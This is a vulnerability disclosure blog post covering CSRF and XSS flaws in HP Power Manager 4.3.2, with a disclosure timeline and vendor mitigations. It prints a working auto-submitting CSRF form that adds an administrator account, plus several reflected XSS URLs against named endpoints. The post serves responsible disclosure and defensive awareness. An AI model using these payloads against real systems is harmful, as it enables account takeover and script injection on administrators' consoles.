facebook Password Reset Vulnerability Found in

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Thursday, 19 April 2012

HP Power Manager 4.3.2 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Posted on 05:52 by freda
Description
HP Power Manager (HPPM) is a web-based application that enables administrators to manage an HP UPS from a browser-based management console. Administrators can monitor, manage, and control a single UPS locally and remotely.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in HP Power Manager. These issues were discovered in a default installation of HP Power Manager 4.3.2. Other earlier versions may also be affected.

Proof of concept
Cross-Site Request Forgery (CSRF)
==========================
<html>
<body>
<form action="http://[target]/goform/formSetUsers" id="csrf" method="post">
<input type="hidden" name="name9" value="attacker" />
<input type="hidden" name="pass9" value="passwd123" />
<input type="hidden" name="rpass9" value="passwd123" />
<input type="hidden" name="admin9" value="on" />
<input type="hidden" name="actionType" value="1" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Cross-Site Scripting (XSS)
====================
  • http://[target]/contents/exportlogs.asp?logType=Application%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e
  • http://[target]/contents/applicationlogs.asp?SORTCOL=2&SORTORD=2"%20onMouseOver%3dalert%281%29%2f%2f&TIME=0&PAGE=1&ITEMSPERPAGE=20
  • http://[target]/contents/applicationlogs.asp?SORTCOL=2"%20onMouseOver%3dalert%281%29%2f%2f&SORTORD=2&TIME=0&PAGE=1&ITEMSPERPAGE=20
  • http://[target]/contents/pagehelp.asp?Id=About%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e

Solution
HP recommends the following:
  • Open a browser instance, log on to HPPM, perform needed task, and log off from HPPM.
  • Do not visit untrusted web sites while logged on to HPPM.
  • Use a firewall to limit access to HPPM.

References
Vendor URL: http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02711131
Secunia: http://secunia.com/advisories/43058/

Disclosure Timeline
2011-01-25 - CSRF Vulnerability discovered.
2011-01-25 - CSRF Vulnerability reported to Secunia.
2011-01-26 - Secunia confirmed the vulnerability and contacted the vendor.
2011-02-07 - HP released recommendation for CSRF.
2011-02-08 - Advisory published by Secunia.
2011-02-10 - XSS Vulnerability discovered.
2011-02-10 - XSS Vulnerability reported to Secunia.
2011-02-10 - Secunia confirmed the vulnerability and contacted the vendor.
2011-03-09 - HP released recommendation for XSS. 
2011-03-10 - Advisory updated by Secunia.
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Posted in CSRF, HP, XSS | No comments
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • Pligg CMS 1.1.4 Cross-Site Scripting (XSS) Vulnerability
    Description Pligg is an open source CMS (Content Management System) that you can download and use for free. Pligg CMS provides social publis...
  • Facebook Bug #1: Arbitrary File Upload Vulnerability Found in attachments.facebook.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.f...
  • Sybase EAServer 6.3.1 Directory Traversal Vulnerability
    Description Sybase EAServer is the leading solution for distributed and Web-enabled PowerBuilder applications. EA Server can be used to run ...
  • FileCOPA FTP Server 5.02 Directory Traversal Vulnerability
    Description FileCOPA is a commercial FTP server for Windows that is available as shareware. Sow Ching Shiong, an independent vulnerability r...
  • Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Blind SQL Injection vulnerability in careers.microsof...
  • Facebook Bug #4: Password Reset Vulnerability Found in www.facebook.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Password Reset vulnerability in www.facebook.com, whi...
  • Trend Micro Control Manager 5.5 Directory Traversal Vulnerability
    Description Trend Micro Control Manager provides a convenient centralized security management console that is designed to minimize administr...
  • F-Secure Policy Manager Web Reporting 9.00.30231 Path Disclosure and Cross-Site Scripting (XSS) Vulnerability
    Description F-Secure Policy Manager Web Reporting allow administrators to identify computers that are unprotected or vulnerable to virus out...
  • Microsoft Bug #1: Cross-Site Scripting (XSS) Found in connect.microsoft.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in connect.m...
  • Oracle Secure Backup 10.3.0.3.0 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities
    Description Oracle Secure Backup is a general-purpose network data protection tool that simplifies and automates the backup and restore of f...

Categories

  • Adobe
  • Apache
  • Apple
  • Arbitrary File Upload
  • CSRF
  • Directory Traversal
  • F-Secure
  • Facebook
  • HP
  • Microsoft
  • Oracle
  • Password Reset
  • SQL Injection
  • Sybase
  • Symantec
  • Trend Micro
  • Twitter
  • XSS

Blog Archive

  • ►  2013 (1)
    • ►  January (1)
  • ▼  2012 (25)
    • ►  July (1)
    • ►  May (4)
    • ▼  April (20)
      • Twitter Bug #1: Cross-Site Scripting (XSS) Found i...
      • Apple Bug #1: Cross-Site Scripting (XSS) Found in ...
      • Oracle iPlanet Web Server 7.0.9 Multiple Cross-Sit...
      • Apache Camel 2.7.0 Multiple Cross-Site Scripting (...
      • HP System Management Homepage 6.2.2.7 Cross-Site R...
      • Joomla! CMS 2.5.1 Blind SQL Injection Vulnerability
      • Symantec IM Manager 8.4.17 SQL Injection and Cross...
      • Pligg CMS 1.1.4 Cross-Site Scripting (XSS) Vulnera...
      • Symantec Endpoint Protection Manager 11.0.6 Cross-...
      • Oracle Secure Backup 10.3.0.3.0 Cross-Site Request...
      • Trend Micro Control Manager 5.5 Directory Traversa...
      • Trend Micro Control Manager 5.5 Cross-Site Scripti...
      • Adobe ColdFusion 9.0.1.274733 Cross-Site Request F...
      • Sybase EAServer 6.3.1 Directory Traversal Vulnerab...
      • F-Secure Policy Manager Web Reporting 9.00.30231 P...
      • HP Power Manager 4.3.2 Cross-Site Request Forgery ...
      • PrestaShop 1.3.3 Cross-Site Scripting (XSS) Vulner...
      • CompleteFTP Server 4.0.2 Directory Traversal Vulne...
      • SnugServer FTP Server 4.3.0.126 Directory Traversa...
      • FileCOPA FTP Server 5.02 Directory Traversal Vulne...
Powered by Blogger.

About Me

freda
View my complete profile